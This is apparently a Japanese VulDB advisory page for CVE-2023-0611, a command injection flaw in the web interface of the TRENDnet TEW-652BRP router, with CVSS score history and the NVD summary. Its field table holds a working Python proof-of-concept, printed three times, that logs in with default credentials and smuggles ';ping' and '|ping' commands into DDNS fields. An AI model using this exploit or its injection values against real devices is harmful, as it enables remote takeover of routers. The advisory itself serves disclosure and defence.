TRENDnet TEW-652BRP 3.04B01 Web Management Interface get_set.ccp 特権昇格

TRENDnet TEW-652BRP 3.04B01内に 重大 として分類された脆弱性が発見されました。 この問題により影響を受けるのは、コンポーネント【Web Management Interface】のファイル【get_set.ccp】に含まれる未知の機能です。 未知の値で改ざんすることが、 特権昇格を突く攻撃に繋がります。 この脆弱性に対応するCWEの定義は CWE-77 です。 この脆弱性は 2023年02月01日ににて 紹介されました。 この脆弱性は CVE-2023-0611 として扱われます。 攻撃はリモートで開始される場合があります。 技術的詳細情報が入手可能です。 さらに、入手できるエクスプロイトツールが存在します。 エクスプロイトツールは一般に公開されており、悪用される可能性があります。 現時点で、脆弱性の構成から考えられる取引価格帯を約$0-$5k米ドルと算出しました。 この脆弱性は、MITRE ATT&CKプロジェクトによって T1202 に割り当てられました。 このエクスプロイトツールは proof-of-concept として宣言されています。 エクスプロイトツールは vuldb.com から入手可能です。 0dayにはおよそ $0-$5k の価値があったと予想しています。 】のプラグインを提供しています。

フィールド2023年02月01日 14:292023年03月01日 11:042023年03月01日 11:09
cvss2_vuldb_iiCCC
cvss2_vuldb_aiCCC
cvss2_vuldb_ePOCPOCPOC
cvss2_vuldb_rcCCC
cvss2_vuldb_auSSS
cvss2_vuldb_rlNDNDND
cvss3_vuldb_rlXXX
cvss2_vuldb_basescore9.09.09.0
cvss2_vuldb_tempscore8.18.18.1
cvss3_vuldb_basescore8.88.88.8
cvss3_vuldb_tempscore8.38.38.3
cvss3_meta_basescore8.88.88.8
cvss3_meta_tempscore8.38.38.6
price_0day$0-$5k$0-$5k$0-$5k
vendorTRENDnetTRENDnetTRENDnet
nameTEW-652BRPTEW-652BRPTEW-652BRP
version3.04B013.04B013.04B01
componentWeb Management InterfaceWeb Management InterfaceWeb Management Interface
fileget_set.ccpget_set.ccpget_set.ccp
cwe77 (特権昇格)77 (特権昇格)77 (特権昇格)
risk222
cvss3_vuldb_avNNN
cvss3_vuldb_acLLL
cvss3_vuldb_prLLL
cvss3_vuldb_uiNNN
cvss3_vuldb_sUUU
cvss3_vuldb_cHHH
cvss3_vuldb_iHHH
cvss3_vuldb_aHHH
cvss3_vuldb_ePPP
cvss3_vuldb_rcCCC
availability111
publicity111
cveCVE-2023-0611CVE-2023-0611CVE-2023-0611
responsibleVulDBVulDBVulDB
date1675206000 (2023年02月01日)1675206000 (2023年02月01日)1675206000 (2023年02月01日)
cvss2_vuldb_avNNN
cvss2_vuldb_acLLL
cvss2_vuldb_ciCCC
languagePythonPythonPython
sourcecodeimport requests,socket import re import time from urllib.parse import urlencode username = 'admin' password = 'admin' device_web_ip = '192.168.10.1' ping_target_ip = '192.168.10.2' headers = {'Host': '{}'.format(device_web_ip), 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded', 'Origin': 'http://{}'.format(device_web_ip), 'Connection': 'keep-alive', 'Referer': 'http://{}/ping_test.htm'.format(device_web_ip), 'Upgrade-Insecure-Requests': '1'} login_params = 'html_response_page=login_fail.htm&login_name=&username={0}&password={1}&curr_language=0&login_n={0}&login_pass={1}&lang_select=0&login=Login'.format(username,password) login_url = 'http://{}/login.ccp'.format(device_web_ip) r = requests.post(url=login_url, data=login_params, headers=headers, timeout=0.2) if r is None or r.status_code != 200: print('Login wrong, please retry!') exit() params = { 'ccp_act': 'set', 'ccpSubEvent': 'CCP_SUB_DDNS', 'nextPage': 'ddns.htm', 'ddnsCfg_DDNSEnable_1.1.0.0.0': 1, 'ddnsCfg_DDNSServer_1.1.0.0.0': 'dynupdate.no-ip.com', 'ddnsCfg_HostName_1.1.0.0.0': ';ping -c 1 {};'.format(ping_target_ip), 'ddnsCfg_Username_1.1.0.0.0': 'admin', 'ddnsCfg_Password_1.1.0.0.0': '|ping -c 1 {}'.format(ping_target_ip), 'ddnsCfg_Timeout_1.1.0.0.0': '' } method = 'POST' url = 'http://{}/get_set.ccp'.format(device_web_ip) try: r = requests.request(method=method,url=url,headers=headers,data=params,verify=False,timeout=0.2) except Exception as e: passimport requests,socket import re import time from urllib.parse import urlencode username = 'admin' password = 'admin' device_web_ip = '192.168.10.1' ping_target_ip = '192.168.10.2' headers = {'Host': '{}'.format(device_web_ip), 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded', 'Origin': 'http://{}'.format(device_web_ip), 'Connection': 'keep-alive', 'Referer': 'http://{}/ping_test.htm'.format(device_web_ip), 'Upgrade-Insecure-Requests': '1'} login_params = 'html_response_page=login_fail.htm&login_name=&username={0}&password={1}&curr_language=0&login_n={0}&login_pass={1}&lang_select=0&login=Login'.format(username,password) login_url = 'http://{}/login.ccp'.format(device_web_ip) r = requests.post(url=login_url, data=login_params, headers=headers, timeout=0.2) if r is None or r.status_code != 200: print('Login wrong, please retry!') exit() params = { 'ccp_act': 'set', 'ccpSubEvent': 'CCP_SUB_DDNS', 'nextPage': 'ddns.htm', 'ddnsCfg_DDNSEnable_1.1.0.0.0': 1, 'ddnsCfg_DDNSServer_1.1.0.0.0': 'dynupdate.no-ip.com', 'ddnsCfg_HostName_1.1.0.0.0': ';ping -c 1 {};'.format(ping_target_ip), 'ddnsCfg_Username_1.1.0.0.0': 'admin', 'ddnsCfg_Password_1.1.0.0.0': '|ping -c 1 {}'.format(ping_target_ip), 'ddnsCfg_Timeout_1.1.0.0.0': '' } method = 'POST' url = 'http://{}/get_set.ccp'.format(device_web_ip) try: r = requests.request(method=method,url=url,headers=headers,data=params,verify=False,timeout=0.2) except Exception as e: passimport requests,socket import re import time from urllib.parse import urlencode username = 'admin' password = 'admin' device_web_ip = '192.168.10.1' ping_target_ip = '192.168.10.2' headers = {'Host': '{}'.format(device_web_ip), 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded', 'Origin': 'http://{}'.format(device_web_ip), 'Connection': 'keep-alive', 'Referer': 'http://{}/ping_test.htm'.format(device_web_ip), 'Upgrade-Insecure-Requests': '1'} login_params = 'html_response_page=login_fail.htm&login_name=&username={0}&password={1}&curr_language=0&login_n={0}&login_pass={1}&lang_select=0&login=Login'.format(username,password) login_url = 'http://{}/login.ccp'.format(device_web_ip) r = requests.post(url=login_url, data=login_params, headers=headers, timeout=0.2) if r is None or r.status_code != 200: print('Login wrong, please retry!') exit() params = { 'ccp_act': 'set', 'ccpSubEvent': 'CCP_SUB_DDNS', 'nextPage': 'ddns.htm', 'ddnsCfg_DDNSEnable_1.1.0.0.0': 1, 'ddnsCfg_DDNSServer_1.1.0.0.0': 'dynupdate.no-ip.com', 'ddnsCfg_HostName_1.1.0.0.0': ';ping -c 1 {};'.format(ping_target_ip), 'ddnsCfg_Username_1.1.0.0.0': 'admin', 'ddnsCfg_Password_1.1.0.0.0': '|ping -c 1 {}'.format(ping_target_ip), 'ddnsCfg_Timeout_1.1.0.0.0': '' } method = 'POST' url = 'http://{}/get_set.ccp'.format(device_web_ip) try: r = requests.request(method=method,url=url,headers=headers,data=params,verify=False,timeout=0.2) except Exception as e: pass
cve_assigned1675206000 (2023年02月01日)1675206000 (2023年02月01日)
cve_nvd_summaryA vulnerability, which was classified as critical, has been found in TRENDnet TEW-652BRP 3.04B01. This issue affects some unknown processing of the file get_set.ccp of the component Web Management Interface. The manipulation leads to command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-219935.A vulnerability, which was classified as critical, has been found in TRENDnet TEW-652BRP 3.04B01. This issue affects some unknown processing of the file get_set.ccp of the component Web Management Interface. The manipulation leads to command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-219935.
cvss3_nvd_avN
cvss3_nvd_acL
cvss3_nvd_prL
cvss3_nvd_uiN
cvss3_nvd_sU
cvss3_nvd_cH
cvss3_nvd_iH
cvss3_nvd_aH
cvss2_nvd_avN
cvss2_nvd_acL
cvss2_nvd_auS
cvss2_nvd_ciC
cvss2_nvd_iiC
cvss2_nvd_aiC
cvss3_cna_avN
cvss3_cna_acL
cvss3_cna_prL
cvss3_cna_uiN
cvss3_cna_sU
cvss3_cna_cH
cvss3_cna_iH
cvss3_cna_aH
cve_cnaVulDB
cvss2_nvd_basescore9.0
cvss3_nvd_basescore8.8
cvss3_cna_basescore8.8

概要

Do you know our Splunk app?

Download it now for free!